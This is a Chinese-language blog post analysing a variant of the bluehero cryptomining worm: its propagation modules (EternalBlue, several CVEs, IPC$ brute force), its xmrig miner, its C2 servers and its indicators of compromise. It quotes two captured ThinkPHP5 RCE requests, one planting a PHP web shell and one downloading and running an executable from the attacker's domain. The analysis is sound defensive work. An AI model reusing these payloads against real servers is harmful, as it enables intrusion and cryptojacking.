首页 » NetworkSec » VirusAnalysis » 正文

bluehero挖矿蠕虫新变种v20190604简单分析

0x00 概述

捕获到利用thinkphp5 rce漏洞的攻击记录,经分析为bluehero新变种,编译时间为20190604。

attack:http://1.2.3.4:80/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET[‘xcmd’];system($action);?^>>hydra.php;
attack:http://1.2.3.4:80/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile(‘http://fid.hognoob.se/download.exe’,’SystemRoot/Temp/wtrgaltqtqzkxtb28962.exe’);start SystemRoot/Temp/wtrgaltqtqzkxtb28962.exe;

 

0x01 逆向分析

download.exe:

SHA256:6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b
upx脱壳
upx.exe -d “” -o “”
编译时间戳
2019-06-04 04:26:51
PEID

  • PE: packer: UPX(3.94)[NRV,brute]
  • PE: compiler: Microsoft Visual C/C++(6.0)[-]
  • PE: linker: Microsoft Linker(6.0)[EXE32]

入口所在段
UPX1
镜像基地址
0x400000
入口点(OEP)
0x4dcc0
 
下载母体文件

存储到%SystemRoot%\Temp\SunloglicySrv.exe。

SunloglicySrv.exe

upx脱壳
下载配置
http://uio.hognoob.se:63145/cfg.ini

生成ip段
获取本地IP地址,访问http://2019.ip138.com/ic.asp 获取所在公网ip,将生成的ip段包括所在公网的B段,以及随机生成的公网地址保存为ip.txt,启动端口扫描工具对ip的139/445端口进行扫描,将扫描结果保存到result.txt。

用masscan扫描内网和外网的端口

永恒之蓝攻击(32/64)

  

cve-2019-2725攻击

 
ipc$爆破
利用内置密码字典进行ipc$远程爆破,爆破登录成功后在目标机器利用psexec工具或者wmic执行远程命令植入木马程序。

cve-2017-5638攻击

cve-2017-10271攻击
好像和2725用的是相同的payload。

thinkphp5 rce攻击

tomcat put 攻击

0x02 流量分析

download.exe

SunloglicySrv.exe下载cfg.ini

爆破mssql-1433

0x03 行为分析

SystemRoot/Temp/wtrgaltqtqzkxtb28962.exe(即download.exe)
运行后自删除,并释放后门文件ucokcu.exe(随机六字母文件名)
该程序没有图标,没文件名,具有隐蔽性,后门程序作为系统服务启动。

 

download.exe下载病毒母体SunloglicySrv.exe

写入到C:\webkitssdk\2.7.92\目录下(不确定是SunloglicySrv.exe还是ucokcu.exe,按微步的沙箱看应该是ucokcu.exe)

木马后门黑客服务器ip。

SunloglicySrv.exe

下载挖矿配置cfg.ini
释放一堆文件:
zunnrhu.exe和SunloglicySrv.exe基本一样,含有多种攻击模块。


ipc$爆破,利用mimikatz读取密码。

疑似端口扫描程序。

永恒之蓝。

cve-2017-8464。

生成ip段

利用procdump和psexec。

矿机程序,xmrig挖门罗币。
upx脱壳

矿池

添加计划任务。

添加服务。

攻击7001,weblogic漏洞。

连接黑客服务器80.82.70.188:35791(远控)

相关进程。

0x04 关联分析

fid.hognoob.se
注册时间2019-03-01 00:00:00
过期时间2020/3/1 0:00:00
45.67.14.164(英国 英格兰 伦敦)
21/tcp   open   ftp            Pure-FTPd
80/tcp   open   http           nginx
9898/tcp open   http           Ajenti http control panel
fid.hognoob.se服务器iP:
当前解析:
英国45.67.14.164
历史解析记录:
2019-05-15—–2019-06-1445.67.14.164
2019-05-08—–2019-05-08195.128.124.189
2019-04-27—–2019-04-28195.128.124.159
2019-04-15—–2019-04-18195.128.127.237
2019-04-01—–2019-04-1145.67.14.168
2019-03-17—–2019-03-19195.128.127.254
2019-03-13—–2019-03-1345.79.66.44
bt宝塔面板

45.67.14.164
英国 英格兰 伦敦
运营商:pitcommunications.net

195.128.124.140
XMRCoinMiner挖矿木马
运营商:inoventica.ru
俄罗斯莫斯科
 
80.82.70.234
荷兰 阿姆斯特丹Ecatel公司
 
185.164.72.143
iis7.5
猜测攻击者应该是欧洲的。
 

0x05 IOC

http://fid.hognoob.se/download.exe(45.67.14.164)//19日更改解析ip(80.82.70.234)//22日更改解析为127.0.0.1/185.164.72.143(荷兰北阿姆斯特丹/伊朗)
SHA-256: 6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b
http://fid.hognoob.se/SunloglicySrv.exe
SHA-256: e5f1244002929418a08d4623b7de39ccf591acb868d0e448ed4f7174d03c2c81
http://uio.hognoob.se:63145/cfg.ini(45.67.14.166)
195.128.124.140
 

0x06 结语

总体来说,v20190604版本和之前的bluehero版本差别不大,也可能是分析不完全,如有错漏,欢迎指点!
 

0x07 参考资料

v201808
https://www.freebuf.com/column/180544.html
v201903
https://s.tencent.com/research/report/675.html
v201905
https://s.tencent.com/research/report/724.html

Comment

please input captcha *